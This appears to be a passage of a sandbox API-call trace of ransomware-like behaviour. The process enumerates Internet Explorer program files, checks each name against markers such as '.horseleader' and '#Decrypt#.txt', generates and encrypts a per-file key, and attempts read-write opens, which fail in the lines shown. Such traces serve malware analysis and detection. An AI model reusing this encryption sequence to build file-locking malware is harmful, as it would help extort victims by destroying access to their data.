lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0252.031] CloseHandle (hObject=0x1cc) returned 1 [0252.031] GetProcessHeap () returned 0x780000 [0252.031] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0252.031] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f55643f, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0x5f55643f, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x23ff2d20, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xce00, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="hmmapi.dll", cAlternateFileName="")) returned 1 [0252.032] lstrcmpiW (lpString1="hmmapi.dll", lpString2="Windows") returned -1 [0252.032] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\hmmapi.dll") returned 49 [0252.032] StrStrIW (lpFirst="hmmapi.dll", lpSrch=".horseleader") returned 0x0 [0252.032] lstrcmpW (lpString1="hmmapi.dll", lpString2="#Decrypt#.txt") returned 1 [0252.032] lstrcmpW (lpString1="hmmapi.dll", lpString2="_uninstalling_.png") returned 1 [0252.032] lstrlenW (lpString=".testttjffg") returned 11 [0252.032] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\hmmapi.dll", lpSrch=".testttjffg") returned 0x0 [0252.032] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0252.032] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0252.032] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\hmmapi.dll" (normalized: "c:\\program files\\internet explorer\\hmmapi.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.035] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9a30bbb, ftCreationTime.dwHighDateTime=0x1c9ea0a, ftLastAccessTime.dwLowDateTime=0xb9a30bbb, ftLastAccessTime.dwHighDateTime=0x1c9ea0a, ftLastWriteTime.dwLowDateTime=0xb9a30bbb, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xa59, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="ie8props.propdesc", cAlternateFileName="")) returned 1 [0252.035] lstrcmpiW (lpString1="ie8props.propdesc", lpString2="Windows") returned -1 [0252.035] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\ie8props.propdesc") returned 56 [0252.035] StrStrIW (lpFirst="ie8props.propdesc", lpSrch=".horseleader") returned 0x0 [0252.035] lstrcmpW (lpString1="ie8props.propdesc", lpString2="#Decrypt#.txt") returned 1 [0252.035] lstrcmpW (lpString1="ie8props.propdesc", lpString2="_uninstalling_.png") returned 1 [0252.036] lstrlenW (lpString=".testttjffg") returned 11 [0252.036] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\ie8props.propdesc", lpSrch=".testttjffg") returned 0x0 [0252.036] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0252.036] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0252.036] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\ie8props.propdesc" (normalized: "c:\\program files\\internet explorer\\ie8props.propdesc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.036] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa37b6f98, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa37b6f98, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa37b6f98, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1e00, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="iecompat.dll", cAlternateFileName="")) returned 1 [0252.036] lstrcmpiW (lpString1="iecompat.dll", lpString2="Windows") returned -1 [0252.036] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\iecompat.dll") returned 51 [0252.036] StrStrIW (lpFirst="iecompat.dll", lpSrch=".horseleader") returned 0x0 [0252.036] lstrcmpW (lpString1="iecompat.dll", lpString2="#Decrypt#.txt") returned 1 [0252.036] lstrcmpW (lpString1="iecompat.dll", lpString2="_uninstalling_.png") returned 1 [0252.036] lstrlenW (lpString=".testttjffg") returned 11 [0252.036] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\iecompat.dll", lpSrch=".testttjffg") returned 0x0 [0252.036] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0252.036] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0252.036] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\iecompat.dll" (normalized: "c:\\program files\\internet explorer\\iecompat.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.036] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa37b6f98, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa37b6f98, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa37dd0f9, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xf7600, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="iedvtool.dll", cAlternateFileName="")) returned 1 [0252.036] lstrcmpiW (lpString1="iedvtool.dll", lpString2="Windows") returned -1 [0252.037] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\iedvtool.dll") returned 51 [0252.037] StrStrIW (lpFirst="iedvtool.dll", lpSrch=".horseleader") returned 0x0 [0252.037] lstrcmpW (lpString1="iedvtool.dll", lpString2="#Decrypt#.txt") returned 1 [0252.037] lstrcmpW (lpString1="iedvtool.dll", lpString2="_uninstalling_.png") returned 1 [0252.037] lstrlenW (lpString=".testttjffg") returned 11 [0252.037] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\iedvtool.dll", lpSrch=".testttjffg") returned 0x0 [0252.037] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0252.037] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0252.037] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\iedvtool.dll" (normalized: "c:\\program files\\internet explorer\\iedvtool.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.038] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa357baf4, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa357baf4, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa357baf4, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x41e00, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="ieinstal.exe", cAlternateFileName="")) returned 1 [0252.038] lstrcmpiW (lpString1="ieinstal.exe", lpString2="Windows") returned -1 [0252.038] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\ieinstal.exe") returned 51 [0252.038] StrStrIW (lpFirst="ieinstal.exe", lpSrch=".horseleader") returned 0x0 [0252.038] lstrcmpW (lpString1="ieinstal.exe", lpString2="#Decrypt#.txt") returned 1 [0252.038] lstrcmpW (lpString1="ieinstal.exe", lpString2="_uninstalling_.png") returned 1 [0252.038] lstrlenW (lpString=".testttjffg") returned 11 [0252.038] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\ieinstal.exe", lpSrch=".testttjffg") returned 0x0 [0252.038] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0252.038] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0252.038] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\ieinstal.exe" (normalized: "c:\\program files\\internet explorer\\ieinstal.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.038] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdecd4578, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xdecd4578, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0xe3cb04e0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x1c400, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="ielowutil.exe", cAlternateFileName="")) returned 1 [0252.038] lstrcmpiW (lpString1="ielowutil.exe", lpString2="Windows") returned -1 [0252.038] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\ielowutil.exe") returned 52 [0252.038] StrStrIW (lpFirst="ielowutil.exe", lpSrch=".horseleader") returned 0x0 [0252.038] lstrcmpW (lpString1="ielowutil.exe", lpString2="#Decrypt#.txt") returned 1 [0252.038] lstrcmpW (lpString1="ielowutil.exe", lpString2="_uninstalling_.png") returned 1 [0252.038] lstrlenW (lpString=".testttjffg") returned 11 [0252.038] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\ielowutil.exe", lpSrch=".testttjffg") returned 0x0 [0252.038] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0252.038] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0252.039] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\ielowutil.exe" (normalized: "c:\\program files\\internet explorer\\ielowutil.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.039] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3803259, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa3803259, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa3803259, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x6e200, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="ieproxy.dll", cAlternateFileName="")) returned 1 [0252.039] lstrcmpiW (lpString1="ieproxy.dll", lpString2="Windows") returned -1 [0252.039] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\ieproxy.dll") returned 50 [0252.039] StrStrIW (lpFirst="ieproxy.dll", lpSrch=".horseleader") returned 0x0 [0252.039] lstrcmpW (lpString1="ieproxy.dll", lpString2="#Decrypt#.txt") returned 1 [0252.039] lstrcmpW (lpString1="ieproxy.dll", lpString2="_uninstalling_.png") returned 1 [0252.039] lstrlenW (lpString=".testttjffg") returned 11 [0252.039] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\ieproxy.dll", lpSrch=".testttjffg") returned 0x0 [0252.039] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0252.039] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0252.039] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\ieproxy.dll" (normalized: "c:\\program files\\internet explorer\\ieproxy.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.039] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa357baf4, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa357baf4, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa357baf4, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x47a00, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="IEShims.dll", cAlternateFileName="")) returned 1 [0252.039] lstrcmpiW (lpString1="IEShims.dll", lpString2="Windows") returned -1 [0252.039] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\IEShims.dll") returned 50 [0252.039] StrStrIW (lpFirst="IEShims.dll", lpSrch=".horseleader") returned 0x0 [0252.039] lstrcmpW (lpString1="IEShims.dll", lpString2="#Decrypt#.txt") returned 1 [0252.039] lstrcmpW (lpString1="IEShims.dll", lpString2="_uninstalling_.png") returned 1 [0252.039] lstrlenW (lpString=".testttjffg") returned 11 [0252.040] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\IEShims.dll", lpSrch=".testttjffg") returned 0x0 [0252.040] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0252.040] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0252.040] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\IEShims.dll" (normalized: "c:\\program files\\internet explorer\\ieshims.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.040] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa387567a, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa387567a, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa387567a, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xa9b10, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="iexplore.exe", cAlternateFileName="")) returned 1 [0252.040] lstrcmpiW (lpString1="iexplore.exe", lpString2="Windows") returned -1 [0252.040] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\iexplore.exe") returned 51 [0252.040] StrStrIW (lpFirst="iexplore.exe", lpSrch=".horseleader") returned 0x0 [0252.040] lstrcmpW (lpString1="iexplore.exe", lpString2="#Decrypt#.txt") returned 1 [0252.040] lstrcmpW (lpString1="iexplore.exe", lpString2="_uninstalling_.png") returned 1 [0252.040] lstrlenW (lpString=".testttjffg") returned 11 [0252.040] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\iexplore.exe", lpSrch=".testttjffg") returned 0x0 [0252.040] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0252.040] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0252.040] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files\\internet explorer\\iexplore.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.040] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3686496, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa3686496, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa36ac5f7, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x7b600, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="jsdbgui.dll", cAlternateFileName="")) returned 1 [0252.040] lstrcmpiW (lpString1="jsdbgui.dll", lpString2="Windows") returned -1 [0252.040] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\jsdbgui.dll") returned 50 [0252.041] StrStrIW (lpFirst="jsdbgui.dll", lpSrch=".horseleader") returned 0x0 [0252.041] lstrcmpW (lpString1="jsdbgui.dll", lpString2="#Decrypt#.txt") returned 1 [0252.041] lstrcmpW (lpString1="jsdbgui.dll", lpString2="_uninstalling_.png") returned 1 [0252.041] lstrlenW (lpString=".testttjffg") returned 11 [0252.041] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\jsdbgui.dll", lpSrch=".testttjffg") returned 0x0 [0252.041] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0252.041] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0252.041] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\jsdbgui.dll" (normalized: "c:\\program files\\internet explorer\\jsdbgui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.041] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe54abd0a, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xe54abd0a, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x2b495380, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x23600, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="jsdebuggeride.dll", cAlternateFileName="")) returned 1 [0252.041] lstrcmpiW (lpString1="jsdebuggeride.dll", lpString2="Windows") returned -1 [0252.041] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\jsdebuggeride.dll") returned 56 [0252.041] StrStrIW (lpFirst="jsdebuggeride.dll", lpSrch=".horseleader") returned 0x0 [0252.041] lstrcmpW (lpString1="jsdebuggeride.dll", lpString2="#Decrypt#.txt") returned 1 [0252.041] lstrcmpW (lpString1="jsdebuggeride.dll", lpString2="_uninstalling_.png") returned 1 [0252.041] lstrlenW (lpString=".testttjffg") returned 11 [0252.041] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\jsdebuggeride.dll", lpSrch=".testttjffg") returned 0x0 [0252.041] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0252.041] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0252.041] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\jsdebuggeride.dll" (normalized: "c:\\program files\\internet explorer\\jsdebuggeride.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.041] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe41a0e8a, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xe41a0e8a, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0x2b4b9d70, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x20400, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="JSProfilerCore.dll", cAlternateFileName="")) returned 1 [0252.041] lstrcmpiW (lpString1="JSProfilerCore.dll", lpString2="Windows") returned -1 [0252.042] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\JSProfilerCore.dll") returned 57 [0252.042] StrStrIW (lpFirst="JSProfilerCore.dll", lpSrch=".horseleader") returned 0x0 [0252.042] lstrcmpW (lpString1="JSProfilerCore.dll", lpString2="#Decrypt#.txt") returned 1 [0252.042] lstrcmpW (lpString1="JSProfilerCore.dll", lpString2="_uninstalling_.png") returned 1 [0252.042] lstrlenW (lpString=".testttjffg") returned 11 [0252.042] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\JSProfilerCore.dll", lpSrch=".testttjffg") returned 0x0 [0252.042] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0252.042] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0252.042] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\JSProfilerCore.dll" (normalized: "c:\\program files\\internet explorer\\jsprofilercore.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.043] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa36ac5f7, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa36ac5f7, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa36ac5f7, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x46400, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="jsprofilerui.dll", cAlternateFileName="")) returned 1 [0252.043] lstrcmpiW (lpString1="jsprofilerui.dll", lpString2="Windows") returned -1 [0252.043] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\jsprofilerui.dll") returned 55 [0252.043] StrStrIW (lpFirst="jsprofilerui.dll", lpSrch=".horseleader") returned 0x0 [0252.043] lstrcmpW (lpString1="jsprofilerui.dll", lpString2="#Decrypt#.txt") returned 1 [0252.043] lstrcmpW (lpString1="jsprofilerui.dll", lpString2="_uninstalling_.png") returned 1 [0252.043] lstrlenW (lpString=".testttjffg") returned 11 [0252.043] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Internet Explorer\\jsprofilerui.dll", lpSrch=".testttjffg") returned 0x0 [0252.043] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0252.043] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0252.043] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\jsprofilerui.dll" (normalized: "c:\\program files\\internet explorer\\jsprofilerui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0252.043] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x825d0f8, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0x825d0f8, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0x5909b005, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x579f8, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="msdbg2.dll", cAlternateFileName="")) returned 1 [0252.043] lstrcmpiW (lpString1="msdbg2.dll", lpString2="Windows") returned -1 [0252.044] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Internet Explorer\\msdbg2.dll") returned 49 [0252.044] 